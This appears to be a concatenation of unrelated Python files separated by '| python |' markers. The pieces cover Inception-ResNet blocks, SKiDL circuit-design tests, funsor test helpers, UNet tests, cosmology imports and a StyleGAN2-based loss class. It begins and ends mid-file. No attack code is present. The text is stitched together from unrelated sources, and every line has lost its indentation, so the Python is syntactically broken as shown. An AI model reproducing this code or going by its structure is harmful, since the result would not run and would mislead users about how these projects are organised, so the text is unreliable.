with ParallelBlock() as parallel:
with parallel:
MaxPooling2D([3, 3], stride=2)
with parallel:
Convolution1x1(192)
Convolution3x3(192)
with parallel:
Convolution1x1(filters=256)
Convolution2D([1, 7], filters=256)
Convolution2D([7, 1], filters=320)
Convolution3x3(filters=320, stride=2)
FilterConcat()
def inceptionResnetA():
RectifiedLinearUnit()
with ParallelBlock() as parallel:
with parallel:
with ParallelBlock() as parallel_inner:
with parallel_inner:
Convolution1x1(32)
with parallel_inner:
Convolution1x1(32)
Convolution3x3(32)
with parallel_inner:
Convolution1x1(32)
Convolution3x3(32)
Convolution3x3(32)
Convolution1x1(filters=256)
Sum()
def inceptionResnetB():
RectifiedLinearUnit()
with ParallelBlock() as parallel:
with parallel:
with ParallelBlock() as parallel_inner:
with parallel_inner:
Convolution1x1(128)
with parallel_inner:
Convolution1x1(128)
Convolution2D([1, 7], filters=128)
Convolution2D([7, 1], filters=128)
Convolution1x1(filters=896)
Sum()
| python |
# -*- coding: utf-8 -*-
import trello.checklist as checklist
class Checklist(checklist.Checklist):
pass
| python |
import os
import unittest
from skidl import *
class UnitTestsElectronicDesignAutomationSkidlExamples(unittest.TestCase):
def test_introduction(self):
print("test_introduction")
# Create input & output voltages and ground reference.
vin, vout, gnd = Net('VI'), Net('VO'), Net('GND')
# Create two resistors.
r1, r2 = 2 * Part("Device", 'R', TEMPLATE, footprint='Resistor_SMD.pretty:R_0805_2012Metric')
r1.value = '1K' # Set upper resistor value.
r2.value = '500' # Set lower resistor value.
# Connect the nets and resistors.
vin += r1[1] # Connect the input to the upper resistor.
gnd += r2[2] # Connect the lower resistor to ground.
vout += r1[2], r2[1] # Output comes from the connection of the two resistors.
# Or you could do it with a single line of code:
# vin && r1 && vout && r2 && gnd
# Output the netlist to a file.
generate_netlist()
def test_finding_parts(self):
print("test_finding_parts")
with open("finding_parts.py", "w") as file:
file.write("from skidl import * \n\n")
file.write("search('opamp') \n")
file.write("search('^lm386$') \n")
file.write("search('opamp low-noise dip-8') \n")
file.write("search('opamp (low-noise|dip-8)') \n")
file.write("search('opamp " + '"' + "high performance" + '"' + ") \n")
file.write("show('Amplifier_Audio', 'lm386') \n")
file.write("show('Amplifier_Audio', 'lm38') \n")
file.write("search_footprints('QFN-48') \n")
os.system("python finding_parts.py")
def test_instantiating_parts(self):
print("test_instantiating_parts")
with open('instantiating_parts.py', 'w') as file:
file.write("from skidl import * \n\n")
file.write("resistor = Part('Device','R') \n")
file.write("resistor.value = '1K' \n")
file.write("print('resistor.value : ' + resistor.value) \n")
file.write("resistor = Part('Device','R', value='2K') \n")
file.write("print('resistor.value : ' + resistor.value) \n")
file.write("print('resistor.value : ' + resistor.value) \n")
file.write("print('resistor.ref : ' + resistor.ref) \n")
file.write("resistor.ref = 'R5' \n")
file.write("print('resistor.ref : ' + resistor.ref) \n")
file.write("another_res = Part('Device','R') \n")
file.write("print('another_res.ref : ' + another_res.ref) \n")
file.write("resistor.ref = 'R1' \n")
file.write("print('resistor.ref : ' + resistor.ref) \n")
os.system("python instantiating_parts.py")
def test_connecting_pins(self):
print("test_connecting_pins")
with open('connecting_pins.py', 'w') as file:
file.write("from skidl import * \n\n")
file.write("rup = Part('Device', 'R', value='1K', footprint='Resistor_SMD.pretty:R_0805_2012Metric') \n")
file.write("rlow = Part('Device', 'R', value='500', footprint='Resistor_SMD.pretty:R_0805_2012Metric') \n")
file.write("print('rup.ref : ' + rup.ref) \n")
file.write("print('rlow.ref : ' + rlow.ref) \n")
file.write("print('rup.value : ' + rup.value) \n")
file.write("print('rup.value : ' + rlow.value) \n")
file.write("v_in = Net('VIN') \n")
file.write("print('v_in.name : ' + str(v_in.name)) \n")
file.write("rup[1] += v_in \n")
file.write("print('rup[1].net : ' + str(rup[1].net)) \n")
file.write("gnd = Net('GND') \n")
file.write("rlow[1] += gnd \n")
file.write("print('rlow[1].net : ' + str(rlow[1].net)) \n")
file.write("v_out = Net('VO') \n")
file.write("v_out += rup[2], rlow[2] \n")
file.write("print('rup[2].net : ' + str(rup[2].net)) \n")
file.write("print('rlow[2].net : ' + str(rlow[2].net)) \n")
file.write("rup[2] += rlow[2] \n")
file.write("v_out = Net('VO') \n")
file.write("v_out += rlow[2] \n")
file.write("print('rup[2].net : ' + str(rup[2].net)) \n")
file.write("print('rlow[2].net : ' + str(rlow[2].net)) \n")
file.write("ERC() \n")
file.write("v_in.do_erc = False \n")
file.write("gnd.do_erc = False \n")
file.write("ERC() \n")
file.write("generate_netlist() \n")
file.write("generate_xml() \n")
os.system("python connecting_pins.py")
def test_searching_transistor_npn(self):
print("test_searching_transistor_npn")
with open("searching_transistor_npn.py", "w") as file:
file.write("from skidl import * \n\n")
file.write("search('transistor (npn)') \n")
os.system("python searching_transistor_npn.py")
def test_searching_bridge_rectifier(self):
print("test_searching_bridge_rectifier")
with open("test_searching_bridge_rectifier.py", "w") as file:
file.write("from skidl import * \n\n")
file.write("search('bridge rectifier') \n")
os.system("python test_searching_bridge_rectifier.py")
def test_searching_optocoupler(self):
print("test_searching_optocoupler")
with open("test_searching_optocoupler.py", "w") as file:
file.write("from skidl import * \n\n")
file.write("search('optocoupler') \n")
os.system("python test_searching_optocoupler.py")
def test_searching_resistor(self):
print("test_searching_resistor")
with open("test_searching_resistor.py", "w") as file:
file.write("from skidl import * \n\n")
file.write("search('resistor') \n")
os.system("python test_searching_resistor.py")
def test_searching_terminal_block(self):
print("test_searching_terminal_block")
with open("test_searching_terminal_block.py", "w") as file:
file.write("from skidl import * \n\n")
file.write("search('analog') \n")
os.system("python test_searching_terminal_block.py")
def test_searching_footprint(self):
print("test_searching_footprint")
with open("test_searching_footprint.py", "w") as file:
file.write("from skidl import * \n\n")
file.write("search('footprint') \n")
os.system("python test_searching_footprint.py")
def test_searching_footprints_of_one_resistor(self):
print("test_searching_footprints_of_one_resistor")
with open("test_searching_footprints_of_one_resistor.py", "w") as file:
file.write("from skidl import * \n\n")
file.write("search_footprints('R') \n")
os.system("python test_searching_footprints_of_one_resistor.py")
def test_searching_footprints_of_one_transistor(self):
print("test_searching_footprints_of_one_transistor")
with open("test_searching_footprints_of_one_transistor.py", "w") as file:
file.write("from skidl import * \n\n")
file.write("search_footprints('transistor') \n")
os.system("python test_searching_footprints_of_one_transistor.py")
def test_searching_footprints_of_one_optocoupler(self):
print("test_searching_footprints_of_one_optocoupler")
with open("test_searching_footprints_of_one_optocoupler.py", "w") as file:
file.write("from skidl import * \n\n")
# file.write("search_footprints('optocoupler') \n")
file.write("search_footprints('Relay_SolidState') \n")
os.system("python test_searching_footprints_of_one_optocoupler.py")
def test_searching_footprints_of_one_diode_bridge_rectifier(self):
print("test_searching_footprints_of_one_diode_bridge_rectifier")
with open("test_searching_footprints_of_one_diode_bridge_rectifier.py", "w") as file:
file.write("from skidl import * \n\n")
# file.write("search_footprints('bridge rectifier') \n")
# file.write("search_footprints('GUO40-08NO1') \n")
file.write("search_footprints('Diode_Bridge') \n")
os.system("python test_searching_footprints_of_one_diode_bridge_rectifier.py")
if __name__ == '__main__':
unittest.main()
| python |
# Copyright Contributors to the Pyro project.
# SPDX-License-Identifier: Apache-2.0
import contextlib
import importlib
import itertools
import numbers
import operator
from collections import OrderedDict, namedtuple
from functools import reduce
import numpy as np
import opt_einsum
from multipledispatch import dispatch
from multipledispatch.variadic import Variadic
import funsor.ops as ops
from funsor.cnf import Contraction
from funsor.delta import Delta
from funsor.domains import Bint, Domain, Real
from funsor.gaussian import Gaussian
from funsor.tensor import Tensor
from funsor.terms import Funsor, Number
from funsor.util import get_backend
@contextlib.contextmanager
def xfail_if_not_implemented(msg="Not implemented", *, match=None):
try:
yield
except NotImplementedError as e:
if match is not None and match not in str(e):
raise e from None
import pytest
pytest.xfail(reason="{}:\n{}".format(msg, e))
@contextlib.contextmanager
def xfail_if_not_found(msg="Not implemented"):
try:
yield
except AttributeError as e:
import pytest
pytest.xfail(reason="{}:\n{}".format(msg, e))
def requires_backend(*backends, reason=None):
import pytest
if reason is None:
reason = "Test requires backend {}".format(" or ".join(backends))
return pytest.mark.skipif(get_backend() not in backends, reason=reason)
def excludes_backend(*backends, reason=None):
import pytest
if reason is None:
reason = "Test excludes backend {}".format(" and ".join(backends))
return pytest.mark.skipif(get_backend() in backends, reason=reason)
class ActualExpected(namedtuple("LazyComparison", ["actual", "expected"])):
"""
Lazy string formatter for test assertions.
"""
def __repr__(self):
return "\n".join(["Expected:", str(self.expected), "Actual:", str(self.actual)])
def id_from_inputs(inputs):
if isinstance(inputs, (dict, OrderedDict)):
inputs = inputs.items()
if not inputs:
return "()"
return ",".join(k + "".join(map(str, d.shape)) for k, d in inputs)
@dispatch(object, object, Variadic[float])
def allclose(a, b, rtol=1e-05, atol=1e-08):
if type(a) != type(b):
return False
return ops.abs(a - b) < rtol + atol * ops.abs(b)
dispatch(np.ndarray, np.ndarray, Variadic[float])(np.allclose)
@dispatch(Tensor, Tensor, Variadic[float])
def allclose(a, b, rtol=1e-05, atol=1e-08):
if a.inputs != b.inputs or a.output != b.output:
return False
return allclose(a.data, b.data, rtol=rtol, atol=atol)
def is_array(x):
if isinstance(x, Funsor):
return False
if get_backend() == "torch":
return False
return ops.is_numeric_array(x)
def assert_close(actual, expected, atol=1e-6, rtol=1e-6):
msg = ActualExpected(actual, expected)
if is_array(actual):
assert is_array(expected), msg
elif isinstance(actual, Tensor) and is_array(actual.data):
assert isinstance(expected, Tensor) and is_array(expected.data), msg
elif (
isinstance(actual, Contraction)
and isinstance(actual.terms[0], Tensor)
and is_array(actual.terms[0].data)
):
assert isinstance(expected, Contraction) and is_array(
expected.terms[0].data
), msg
elif isinstance(actual, Contraction) and isinstance(actual.terms[0], Delta):
assert isinstance(expected, Contraction) and isinstance(
expected.terms[0], Delta
), msg
elif isinstance(actual, Gaussian):
assert isinstance(expected, Gaussian)
else:
assert type(actual) == type(expected), msg
if isinstance(actual, Funsor):
assert isinstance(expected, Funsor), msg
assert actual.inputs == expected.inputs, (actual.inputs, expected.inputs)
assert actual.output == expected.output, (actual.output, expected.output)
if isinstance(actual, (Number, Tensor)):
assert_close(actual.data, expected.data, atol=atol, rtol=rtol)
elif isinstance(actual, Delta):
assert frozenset(n for n, p in actual.terms) == frozenset(
n for n, p in expected.terms
)
actual = actual.align(tuple(n for n, p in expected.terms))
for (actual_name, (actual_point, actual_log_density)), (
expected_name,
(expected_point, expected_log_density),
) in zip(actual.terms, expected.terms):
assert actual_name == expected_name
assert_close(actual_point, expected_point, atol=atol, rtol=rtol)
assert_close(actual_log_density, expected_log_density, atol=atol, rtol=rtol)
elif isinstance(actual, Gaussian):
# Note white_vec and prec_sqrt are expected to agree only up to an
# orthogonal factor, but precision and info_vec should agree exactly.
assert_close(actual._info_vec, expected._info_vec, atol=atol, rtol=rtol)
assert_close(actual._precision, expected._precision, atol=atol, rtol=rtol)
elif isinstance(actual, Contraction):
assert actual.red_op == expected.red_op
assert actual.bin_op == expected.bin_op
assert actual.reduced_vars == expected.reduced_vars
assert len(actual.terms) == len(expected.terms)
for ta, te in zip(actual.terms, expected.terms):
assert_close(ta, te, atol, rtol)
elif type(actual).__name__ == "Tensor":
assert get_backend() == "torch"
import torch
assert actual.dtype == expected.dtype, msg
assert actual.shape == expected.shape, msg
if actual.dtype in (torch.long, torch.uint8, torch.bool):
assert (actual == expected).all(), msg
else:
eq = actual == expected
if eq.all():
return
if eq.any():
actual = actual[~eq]
expected = expected[~eq]
diff = (actual.detach() - expected.detach()).abs()
if rtol is not None:
assert (diff / (atol + expected.detach().abs())).max() < rtol, msg
elif atol is not None:
assert diff.max() < atol, msg
elif is_array(actual):
if get_backend() == "jax":
import jax
assert jax.numpy.result_type(actual.dtype) == jax.numpy.result_type(
expected.dtype
), msg
else:
assert actual.dtype == expected.dtype, msg
assert actual.shape == expected.shape, msg
if actual.dtype in (np.int32, np.int64, np.uint8, bool):
assert (actual == expected).all(), msg
else:
actual, expected = np.asarray(actual), np.asarray(expected)
eq = actual == expected
if eq.all():
return
if eq.any():
actual = actual[~eq]
expected = expected[~eq]
diff = abs(actual - expected)
if rtol is not None:
assert (diff / (atol + abs(expected))).max() < rtol, msg
elif atol is not None:
assert diff.max() < atol, msg
elif isinstance(actual, numbers.Number):
diff = abs(actual - expected)
if rtol is not None:
assert diff < (atol + abs(expected)) * rtol, msg
elif atol is not None:
assert diff < atol, msg
elif isinstance(actual, dict):
assert isinstance(expected, dict)
assert set(actual) == set(expected)
for k, actual_v in actual.items():
assert_close(actual_v, expected[k], atol=atol, rtol=rtol)
elif isinstance(actual, tuple):
assert isinstance(expected, tuple)
assert len(actual) == len(expected)
for actual_v, expected_v in zip(actual, expected):
assert_close(actual_v, expected_v, atol=atol, rtol=rtol)
else:
raise ValueError("cannot compare objects of type {}".format(type(actual)))
def check_funsor(x, inputs, output, data=None):
"""
Check dims and shape modulo reordering.
"""
assert isinstance(x, Funsor)
assert dict(x.inputs) == dict(inputs)
if output is not None:
assert x.output == output
if data is not None:
if x.inputs == inputs:
x_data = x.data
else:
x_data = x.align(tuple(inputs)).data
if inputs or output.shape:
assert (x_data == data).all()
else:
assert x_data == data
def xfail_param(*args, **kwargs):
import pytest
return pytest.param(*args, marks=[pytest.mark.xfail(**kwargs)])
def make_einsum_example(equation, fill=None, sizes=(2, 3)):
symbols = sorted(set(equation) - set(",->"))
sizes = {dim: size for dim, size in zip(symbols, itertools.cycle(sizes))}
inputs, outputs = equation.split("->")
inputs = inputs.split(",")
outputs = outputs.split(",")
operands = []
for dims in inputs:
shape = tuple(sizes[dim] for dim in dims)
x = randn(shape)
operand = x if fill is None else (x - x + fill)
# no need to use pyro_dims for numpy backend
if not isinstance(operand, np.ndarray):
operand._pyro_dims = dims
operands.append(operand)
funsor_operands = [
Tensor(operand, OrderedDict([(d, Bint[sizes[d]]) for d in inp]))
for inp, operand in zip(inputs, operands)
]
assert equation == ",".join(
["".join(operand.inputs.keys()) for operand in funsor_operands]
) + "->" + ",".join(outputs)
return inputs, outputs, sizes, operands, funsor_operands
def assert_equiv(x, y):
"""
Check that two funsors are equivalent up to permutation of inputs.
"""
check_funsor(x, y.inputs, y.output, y.data)
def rand(*args):
if isinstance(args[0], tuple):
assert len(args) == 1
shape = args[0]
else:
shape = args
backend = get_backend()
if backend == "torch":
import torch
return torch.rand(shape)
else:
# work around numpy random returns float object instead of np.ndarray object when shape == ()
return np.array(np.random.rand(*shape))
def randint(low, high, size):
backend = get_backend()
if backend == "torch":
import torch
return torch.randint(low, high, size=size)
else:
return np.random.randint(low, high, size=size)
def randn(*args):
if isinstance(args[0], tuple):
assert len(args) == 1
shape = args[0]
else:
shape = args
backend = get_backend()
if backend == "torch":
import torch
return torch.randn(shape)
else:
# work around numpy random returns float object instead of np.ndarray object when shape == ()
return np.array(np.random.randn(*shape))
def random_scale_tril(*args):
if isinstance(args[0], tuple):
assert len(args) == 1
shape = args[0]
else:
shape = args
from funsor.distribution import BACKEND_TO_DISTRIBUTIONS_BACKEND
backend_dist = importlib.import_module(
BACKEND_TO_DISTRIBUTIONS_BACKEND[get_backend()]
).dist
if get_backend() == "torch":
data = randn(shape)
return backend_dist.transforms.transform_to(
backend_dist.constraints.lower_cholesky
)(data)
else:
data = randn(shape[:-2] + (shape[-1] * (shape[-1] + 1) // 2,))
return backend_dist.biject_to(backend_dist.constraints.lower_cholesky)(data)
def zeros(*args):
if isinstance(args[0], tuple):
assert len(args) == 1
shape = args[0]
else:
shape = args
backend = get_backend()
if backend == "torch":
import torch
return torch.zeros(shape)
else:
return np.zeros(shape)
def ones(*args):
if isinstance(args[0], tuple):
assert len(args) == 1
shape = args[0]
else:
shape = args
backend = get_backend()
if backend == "torch":
import torch
return torch.ones(shape)
else:
return np.ones(shape)
def empty(*args):
if isinstance(args[0], tuple):
assert len(args) == 1
shape = args[0]
else:
shape = args
backend = get_backend()
if backend == "torch":
import torch
return torch.empty(shape)
else:
return np.empty(shape)
def random_tensor(inputs, output=Real):
"""
Creates a random :class:`funsor.tensor.Tensor` with given inputs and output.
"""
backend = get_backend()
assert isinstance(inputs, OrderedDict)
assert isinstance(output, Domain)
shape = tuple(d.dtype for d in inputs.values()) + output.shape
if output.dtype == "real":
data = randn(shape)
else:
num_elements = reduce(operator.mul, shape, 1)
if backend == "torch":
import torch
data = torch.multinomial(
torch.ones(output.dtype), num_elements, replacement=True
)
else:
data = np.random.choice(output.dtype, num_elements, replace=True)
data = data.reshape(shape)
return Tensor(data, inputs, output.dtype)
def random_gaussian(inputs):
"""
Creates a random :class:`funsor.gaussian.Gaussian` with given inputs.
"""
assert isinstance(inputs, OrderedDict)
batch_shape = tuple(d.dtype for d in inputs.values() if d.dtype != "real")
event_shape = (sum(d.num_elements for d in inputs.values() if d.dtype == "real"),)
prec_sqrt = randn(batch_shape + event_shape + event_shape)
precision = ops.matmul(prec_sqrt, ops.transpose(prec_sqrt, -1, -2))
precision = precision + 0.5 * ops.new_eye(precision, event_shape[:1])
prec_sqrt = ops.cholesky(precision)
loc = randn(batch_shape + event_shape)
white_vec = ops.matmul(prec_sqrt, ops.unsqueeze(loc, -1)).squeeze(-1)
return Gaussian(white_vec=white_vec, prec_sqrt=prec_sqrt, inputs=inputs)
def random_mvn(batch_shape, dim, diag=False):
"""
Generate a random :class:`torch.distributions.MultivariateNormal` with given shape.
"""
backend = get_backend()
rank = dim + dim
loc = randn(batch_shape + (dim,))
cov = randn(batch_shape + (dim, rank))
cov = cov @ ops.transpose(cov, -1, -2)
if diag:
cov = cov * ops.new_eye(cov, (dim,))
if backend == "torch":
import pyro
return pyro.distributions.MultivariateNormal(loc, cov)
elif backend == "jax":
import numpyro
return numpyro.distributions.MultivariateNormal(loc, cov)
def make_plated_hmm_einsum(num_steps, num_obs_plates=1, num_hidden_plates=0):
assert num_obs_plates >= num_hidden_plates
t0 = num_obs_plates + 1
obs_plates = "".join(opt_einsum.get_symbol(i) for i in range(num_obs_plates))
hidden_plates = "".join(opt_einsum.get_symbol(i) for i in range(num_hidden_plates))
inputs = [str(opt_einsum.get_symbol(t0))]
for t in range(t0, num_steps + t0):
inputs.append(
str(opt_einsum.get_symbol(t))
+ str(opt_einsum.get_symbol(t + 1))
+ hidden_plates
)
inputs.append(str(opt_einsum.get_symbol(t + 1)) + obs_plates)
equation = ",".join(inputs) + "->"
return (equation, "".join(sorted(tuple(set(obs_plates + hidden_plates)))))
def make_chain_einsum(num_steps):
inputs = [str(opt_einsum.get_symbol(0))]
for t in range(num_steps):
inputs.append(str(opt_einsum.get_symbol(t)) + str(opt_einsum.get_symbol(t + 1)))
equation = ",".join(inputs) + "->"
return equation
def make_hmm_einsum(num_steps):
inputs = [str(opt_einsum.get_symbol(0))]
for t in range(num_steps):
inputs.append(str(opt_einsum.get_symbol(t)) + str(opt_einsum.get_symbol(t + 1)))
inputs.append(str(opt_einsum.get_symbol(t + 1)))
equation = ",".join(inputs) + "->"
return equation
def iter_subsets(iterable, *, min_size=None, max_size=None):
if min_size is None:
min_size = 0
if max_size is None:
max_size = len(iterable)
for size in range(min_size, max_size + 1):
yield from itertools.combinations(iterable, size)
class DesugarGetitem:
"""
Helper to desugar ``.__getitem__()`` syntax.
Example::
>>> desugar_getitem[1:3, ..., None]
(slice(1, 3), Ellipsis, None)
"""
def __getitem__(self, index):
return index
desugar_getitem = DesugarGetitem()
| python |
import unittest
import torch.cuda as cuda
from inferno.utils.model_utils import MultiscaleModelTester
class TestUnetMultiscale(unittest.TestCase):
def test_unet_multiscale_2d(self):
from neurofire.models import UNet2DMultiscale
input_shape = (1, 1, 512, 512)
output_shape = ((1, 1, 512, 512),
(1, 1, 256, 256),
(1, 1, 128, 128),
(1, 1, 64, 64))
tester = MultiscaleModelTester(input_shape, output_shape)
if cuda.is_available():
tester.cuda()
tester(UNet2DMultiscale(1, 1,
initial_num_fmaps=12,
fmap_growth=3))
# this may fail on travis due to insufficient ram
@unittest.expectedFailure
def test_unet_multiscale_3d(self):
from neurofire.models import UNet3DMultiscale
input_shape = (1, 1, 32, 128, 128)
output_shape = ((1, 1, 32, 128, 128),
(1, 1, 16, 64, 64),
(1, 1, 8, 32, 32),
(1, 1, 4, 16, 16))
tester = MultiscaleModelTester(input_shape, output_shape)
if cuda.is_available():
tester.cuda()
# test default unet 3d
tester(UNet3DMultiscale(1, 1,
initial_num_fmaps=12,
fmap_growth=3,
scale_factor=2))
# test with residual block
tester(UNet3DMultiscale(1, 1,
initial_num_fmaps=12,
fmap_growth=3,
scale_factor=2,
add_residual_connections=True))
# test unet 3d with anisotropic sampling
output_shape = ((1, 1, 32, 128, 128),
(1, 1, 32, 64, 64),
(1, 1, 32, 32, 32),
(1, 1, 32, 16, 16))
tester = MultiscaleModelTester(input_shape, output_shape)
if cuda.is_available():
tester.cuda()
tester(UNet3DMultiscale(1, 1,
initial_num_fmaps=12,
fmap_growth=3,
scale_factor=[(1, 2, 2),
(1, 2, 2),
(1, 2, 2)]))
if __name__ == '__main__':
unittest.main()
| python |
from .linear_growth_class import CosmoLinearGrowth
from .linear_growth_functions import a2z
from .linear_growth_functions import z2a
from .linear_growth_functions import get_Hz
from .linear_growth_functions import get_Dz
from .linear_growth_functions import get_r
from .linear_growth_functions import get_omega_m_z
from .linear_growth_functions import get_fz
from .linear_growth_functions import get_fz_numerical
from .linear_growth_functions import get_sigma_8
from .linear_growth_functions import get_z_array
| python |
#!/usr/bin/python
#-*- coding: utf-8 -*-
# >.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.
# Licensed under the Apache License, Version 2.0 (the "License")
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# --- File Name: loss_uneven.py
# --- Creation Date: 19-04-2021
# --- Last Modified: Sat 24 Apr 2021 00:10:40 AEST
# --- Author: Xinqi Zhu
# .<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<
"""
Loss for Uneven Network. Code borrowed from Nvidia StyleGAN2-ada-pytorch.
"""
import numpy as np
import torch
from torch import nn
from torch_utils import training_stats
from torch_utils import misc
from torch_utils.ops import conv2d_gradfix
from training.loss import StyleGAN2Loss
#----------------------------------------------------------------------------
class UnevenLoss(StyleGAN2Loss):
def __init__(self, device, G_mapping, G_synthesis, D, augment_pipe=None, style_mixing_prob=0.9, r1_gamma=10,
pl_batch_shrink=2, pl_decay=0.01, pl_weight=2, w1reg_lambda=0., uneven_reg_maxval=1., reg_type='linear',
plz_weight=0., plz_decay=0.01, plzsep_weight=0., plzsep_decay=0.01):
super().__init__(device, G_mapping, G_synthesis, D, augment_pipe, style_mixing_prob, r1_gamma, pl_batch_shrink, pl_decay, pl_weight)
self.w1reg_lambda = w1reg_lambda
self.uneven_reg_maxval = uneven_reg_maxval
self.reg_type = reg_type
self.plz_weight = plz_weight
self.plz_decay = plz_decay
self.plz_mean = torch.zeros([], device=device)
self.plzsep_weight = plzsep_weight
self.plzsep_decay = plzsep_decay
self.plzsep_mean = torch.linspace(0., 1., G_mapping.module.z_dim, device=device)**2
# if self.reg_type == 'cumax_ada' or self.reg_type == 'monoconst_ada':
# self.ada_logits = nn.Parameter(torch.ones(self.G_mapping.z_dim), requires_grad=True)
def get_w1reg_scale(self, w1, cur_device):
# if self.reg_type == 'cumax_ada':
# # if self.use_cumax_adaptive:
# reg_softmax = nn.functional.softmax(self.ada_logits, dim=0)
# reg = torch.cumsum(reg_softmax, dim=0) * self.uneven_reg_maxval
# elif self.reg_type == 'monoconst_ada':
# reg_softmax = nn.functional.softmax(self.ada_logits, dim=0)
# reg_cumax = torch.cumsum(reg_softmax, dim=0)
# reg = reg_cumax / torch.sum(reg_cumax, dim=0) * self.uneven_reg_maxval
if self.reg_type == 'exp':
reg = torch.linspace(0., self.uneven_reg_maxval, w1.size(1)).to(cur_device)
reg = torch.exp(reg)
else:
reg = torch.linspace(0., self.uneven_reg_maxval, w1.size(1)).to(cur_device)
return reg
def accumulate_gradients(self, phase, real_img, real_c, gen_z, gen_c, sync, gain):
assert phase in ['Gmain', 'Greg', 'Gboth', 'Dmain', 'Dreg', 'Dboth', 'Gw1reg',
'Dw1reg', 'Gplzreg', 'Dplzreg', 'Gplzsepreg', 'Dplzsepreg']
do_Gmain = (phase in ['Gmain', 'Gboth'])
do_Dmain = (phase in ['Dmain', 'Dboth'])
do_Gpl = (phase in ['Greg', 'Gboth']) and (self.pl_weight != 0)
do_Dr1 = (phase in ['Dreg', 'Dboth']) and (self.r1_gamma != 0)
do_Gw1reg = (phase in ['Gw1reg', 'Gboth']) and (self.w1reg_lambda != 0)
do_Gplz = (phase in ['Gplzreg', 'Gboth']) and (self.plz_weight != 0)
do_Gplzsep = (phase in ['Gplzsepreg', 'Gboth']) and (self.plzsep_weight != 0)
# Gmain: Maximize logits for generated images.
if do_Gmain:
with torch.autograd.profiler.record_function('Gmain_forward'):
gen_img, _gen_ws = self.run_G(gen_z, gen_c, sync=(sync and not do_Gpl and not do_Gplz and not do_Gplzsep)) # May get synced by Gpl.
gen_logits = self.run_D(gen_img, gen_c, sync=False)
training_stats.report('Loss/scores/fake', gen_logits)
training_stats.report('Loss/signs/fake', gen_logits.sign())
loss_Gmain = torch.nn.functional.softplus(-gen_logits) # -log(sigmoid(gen_logits))
training_stats.report('Loss/G/loss', loss_Gmain)
with torch.autograd.profiler.record_function('Gmain_backward'):
loss_Gmain.mean().mul(gain).backward()
# Gpl: Apply path length regularization.
if do_Gpl:
with torch.autograd.profiler.record_function('Gpl_forward'):
batch_size = gen_z.shape[0] // self.pl_batch_shrink
gen_img, gen_ws = self.run_G(gen_z[:batch_size], gen_c[:batch_size], sync=sync)
pl_noise = torch.randn_like(gen_img) / np.sqrt(gen_img.shape[2] * gen_img.shape[3])
with torch.autograd.profiler.record_function('pl_grads'), conv2d_gradfix.no_weight_gradients():
pl_grads = torch.autograd.grad(outputs=[(gen_img * pl_noise).sum()], inputs=[gen_ws], create_graph=True, only_inputs=True)[0]
pl_lengths = pl_grads.square().sum(2).mean(1).sqrt()
pl_mean = self.pl_mean.lerp(pl_lengths.mean(), self.pl_decay)
self.pl_mean.copy_(pl_mean.detach())
pl_penalty = (pl_lengths - pl_mean).square()
training_stats.report('Loss/pl_penalty', pl_penalty)
loss_Gpl = pl_penalty * self.pl_weight
training_stats.report('Loss/G/reg', loss_Gpl)
with torch.autograd.profiler.record_function('Gpl_backward'):
(gen_img[:, 0, 0, 0] * 0 + loss_Gpl).mean().mul(gain).backward()
# Dmain: Minimize logits for generated images.
loss_Dgen = 0
if do_Dmain:
with torch.autograd.profiler.record_function('Dgen_forward'):
gen_img, _gen_ws = self.run_G(gen_z, gen_c, sync=False)
gen_logits = self.run_D(gen_img, gen_c, sync=False) # Gets synced by loss_Dreal.
training_stats.report('Loss/scores/fake', gen_logits)
training_stats.report('Loss/signs/fake', gen_logits.sign())
loss_Dgen = torch.nn.functional.softplus(gen_logits) # -log(1 - sigmoid(gen_logits))
with torch.autograd.profiler.record_function('Dgen_backward'):
loss_Dgen.mean().mul(gain).backward()
# Dmain: Maximize logits for real images.
# Dr1: Apply R1 regularization.
if do_Dmain or do_Dr1:
name = 'Dreal_Dr1' if do_Dmain and do_Dr1 else 'Dreal' if do_Dmain else 'Dr1'
with torch.autograd.profiler.record_function(name + '_forward'):
real_img_tmp = real_img.detach().requires_grad_(do_Dr1)
real_logits = self.run_D(real_img_tmp, real_c, sync=sync)
training_stats.report('Loss/scores/real', real_logits)
training_stats.report('Loss/signs/real', real_logits.sign())
loss_Dreal = 0
if do_Dmain:
loss_Dreal = torch.nn.functional.softplus(-real_logits) # -log(sigmoid(real_logits))
training_stats.report('Loss/D/loss', loss_Dgen + loss_Dreal)
loss_Dr1 = 0
if do_Dr1:
with torch.autograd.profiler.record_function('r1_grads'), conv2d_gradfix.no_weight_gradients():
r1_grads = torch.autograd.grad(outputs=[real_logits.sum()], inputs=[real_img_tmp], create_graph=True, only_inputs=True)[0]
r1_penalty = r1_grads.square().sum([1,2,3])
loss_Dr1 = r1_penalty * (self.r1_gamma / 2)
training_stats.report('Loss/r1_penalty', r1_penalty)
training_stats.report('Loss/D/reg', loss_Dr1)
with torch.autograd.profiler.record_function(name + '_backward'):
(real_logits * 0 + loss_Dreal + loss_Dr1).mean().mul(gain).backward()
# Gplz: Apply path length regularization on z.
if do_Gplz:
with torch.autograd.profiler.record_function('Gplz_forward'):
batch_size = gen_z.shape[0] // self.pl_batch_shrink
gen_z_used = gen_z[:batch_size]
gen_z_used.requires_grad = True
gen_img, gen_ws = self.run_G(gen_z_used, gen_c[:batch_size], sync=sync)
plz_noise = torch.randn_like(gen_img) / np.sqrt(gen_img.shape[2] * gen_img.shape[3])
with torch.autograd.profiler.record_function('plz_grads'), conv2d_gradfix.no_weight_gradients():
plz_grads = torch.autograd.grad(outputs=[(gen_img * plz_noise).sum()], inputs=[gen_z_used], create_graph=True, only_inputs=True)[0]
gen_z_used.requires_grad = False
plz_lengths = plz_grads.square().sum(-1).sqrt()
plz_mean = self.plz_mean.lerp(plz_lengths.mean(), self.plz_decay)
self.plz_mean.copy_(plz_mean.detach())
plz_penalty = (plz_lengths - plz_mean).square()
training_stats.report('Loss/plz_penalty', plz_penalty)
loss_Gplz = plz_penalty * self.plz_weight
training_stats.report('Loss/G/plz_reg', loss_Gplz)
with torch.autograd.profiler.record_function('Gplz_backward'):
(gen_img[:, 0, 0, 0] * 0 + loss_Gplz).mean().mul(gain).backward()
# Gplzsep: Apply path length regularization on z each dimension.
if do_Gplzsep:
with torch.autograd.profiler.record_function('Gplzsep_forward'):
batch_size = gen_z.shape[0] // self.pl_batch_shrink
gen_z_used = gen_z[:batch_size]
gen_z_used.requires_grad = True
gen_img, gen_ws = self.run_G(gen_z_used, gen_c[:batch_size], sync=sync)
